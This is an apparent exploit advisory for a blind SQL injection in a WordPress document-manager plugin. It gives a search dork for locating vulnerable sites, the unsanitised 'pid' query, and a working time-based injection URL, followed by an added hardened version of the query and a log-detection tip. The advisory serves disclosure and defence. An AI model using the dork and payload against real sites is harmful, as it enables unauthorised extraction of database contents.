WordPress Plugin SP Project & Document Manager 2.5.3 – Blind SQL Injection

Author: Catsecurity
Date: 2015-03-31
Source: https://www.exploit-db.com/exploits/36576/

# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: 2.5.3 and earlier
# Tested on: Chrome (it is a PHP application)
# CVE : N/A


# Timeline #
[2015.03.05] Reported to the vendor
[2015.03.06?] Fixed in update 2.5.4


# Details #

- The plugin does not validate an integer parameter before using it in a query. Unauthorized users can attack websites that use this plugin.
- The vulnerable code is in the thumbnails() function in [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- The "pid" parameter is not sanitized.


# Vulnerable code #

ajax.php, lines 1132-1135:

echo '<div id="dlg_cdm_thumbnails">';
if ($_GET['pid'] != "") {
    $r_current_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'] . "", ARRAY_A);
}


# POC #
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

If the condition is true (the first character of the database name is 'a', 0x61), the response is delayed by 5 seconds.


The vulnerable parameter must be cast to an integer before it is used in the query.
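The following is an added example, not the plugin's own code or the vendor's 2.5.4 fix. It places the query quoted above beside a hardened version that treats "pid" as the integer it is supposed to be: the value is cast with absint() and then bound with $wpdb->prepare() using the %d placeholder, so the string never reaches the SQL text. It assumes it runs inside WordPress (where $wpdb, absint(), wp_unslash() and $wpdb->prepare() exist); the function names cdm_thumbnails_vulnerable() and cdm_thumbnails_hardened() are hypothetical, and the table name sp_cu_project is taken from the advisory.

```php
<?php
// Added example, not code from the plugin. Assumes a WordPress runtime:
// $wpdb, absint(), wp_unslash() and $wpdb->prepare() are WordPress core APIs.

// Vulnerable pattern quoted in the advisory: the raw query-string value is
// concatenated into the SQL, so any expression the caller supplies is executed
// by the database (the time-based payload in the POC relies on exactly this).
function cdm_thumbnails_vulnerable( $wpdb ) {
    if ( isset( $_GET['pid'] ) && $_GET['pid'] != "" ) {
        return $wpdb->get_results(
            "SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'],
            ARRAY_A
        );
    }
    return array();
}

// Hardened version. absint() reduces the input to a non-negative integer:
// a payload such as "if(substr(...),sleep(5),1)" becomes 0 and the function
// returns before touching the database. The surviving integer is then bound
// through $wpdb->prepare() with %d, so the SQL text itself is a constant.
function cdm_thumbnails_hardened( $wpdb ) {
    $pid = isset( $_GET['pid'] ) ? absint( wp_unslash( $_GET['pid'] ) ) : 0;
    if ( 0 === $pid ) {
        return array();
    }

    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}sp_cu_project WHERE id = %d",
        $pid
    );
    return $wpdb->get_results( $sql, ARRAY_A );
}
```

On the detection side, the same property gives a cheap log check: a request to ajax.php with function=thumbnails whose pid value is not a plain integer is never legitimate for this endpoint, so web-server or WAF logs can be filtered on that condition alone without needing to recognise any particular payload.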